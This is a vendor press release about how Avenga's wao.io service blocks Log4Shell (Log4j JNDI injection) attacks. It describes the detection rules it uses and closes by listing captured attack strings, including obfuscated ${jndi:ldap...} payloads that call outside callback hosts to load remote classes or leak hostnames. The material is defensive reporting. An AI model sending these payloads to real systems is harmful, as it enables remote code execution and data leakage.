Log4j exploit: Avenga’s wao.io protects web services and their users from critical vulnerability


The critical zero-day vulnerability in version 2.14.1 of the widely used Apache Log4j library, published on December 9, affects almost all online services worldwide. Avenga’s security experts have analyzed how this vulnerability can be exploited and implemented initial protective measures in the company’s own wao.io service. The cloud solution integrates like a content delivery network and is used primarily by numerous e-commerce companies to run their web stores more securely and faster without changing the code of their sites.

In the first 72 hours since the vulnerability became known, wao.io has blocked 1,159 malicious requests from attackers on customer sites. Two specific measures in particular are being used:

  • URL and request headers (e.g. User-Agent): Strings containing the suspicious sequence ${ (or its URL-encoded form, %24 and %7b) cause the request to be blocked.
  • POST requests: For form posts (such as HTML login forms), the submitted values are also scanned for suspicious strings and blocked if necessary.

Although all of the attacks try to inject a pattern of the form ${jndi:ldap…, searching for this substring alone is not enough to defend against every attacker. It is a simple first step that catches the most obvious form of the attack, but within the first few days the attackers were already one step ahead and had refined it: to obfuscate the injection, they use nested constructs that make it unrecognizable, e.g. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}…

When this string is parsed, it resolves back to the original form, but a simple search for ${jndi:ldap… no longer finds it. Besides LDAP lookups, DNS lookups are also attempted. With the security mechanisms wao.io has put in place over the last few days, even such more sophisticated attacks are detected and blocked.

The risk of inadvertently blocking legitimate requests that contain these characters (false positives) is very low. Nevertheless, experts continuously analyze the log files to ensure that wao.io customers can continue to operate their websites not only securely, but also reliably and without downtime.

"We will continue to monitor the activity around the log4shell gap and adapt the protection in wao.io accordingly," says Roland Guelle, VP Technology at Avenga. He continued, "It's important to understand that wao.io alone is still not enough protection. There are also other ways to exploit the gap that we cannot prevent with our approach. Users should therefore definitely take steps on their end to replace the malicious software version, or prevent the execution of the problematic code through appropriate settings."

The team behind wao.io continuously analyzes attacker behavior so that it can react immediately to modified attacks. This has already revealed numerous cases in which different attack patterns are combined: other types of attacks (e.g. code or SQL injection) are also being tried, and those probes are now additionally being extended to include the newly disclosed vulnerability. This makes clear that comprehensive website protection is essential, regardless of the current vulnerability and beyond it. Companies should rely on their own experts with appropriate monitoring for this, and additionally choose CDN providers that include protection against these and other attack vectors. It is also advisable to take out appropriate insurance in case the countermeasures fail or come too late.

Examples of attack requests that have come to the attention of Avenga’s security experts include:

User-Agent:

${jndi:ldap://c6rlj0ovc25q3hjjf3tgcg5iubyyyyypw.interact.sh/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.example.com}

Request header Via:

${jndi:ldap://n714d2e7e.aHR0cDovL3JhdG9yLXN0YWdlLm5ldHpjbHViLm5ldDo4MA==.dnsprobe.${::-r}edteam.tf/exploit.class}

Request header X-Forwarded-For:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.0000nlm6c0j53v2s668g61398133715me.interact.sh}

Path:

/?test=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://interactsh-url/poc}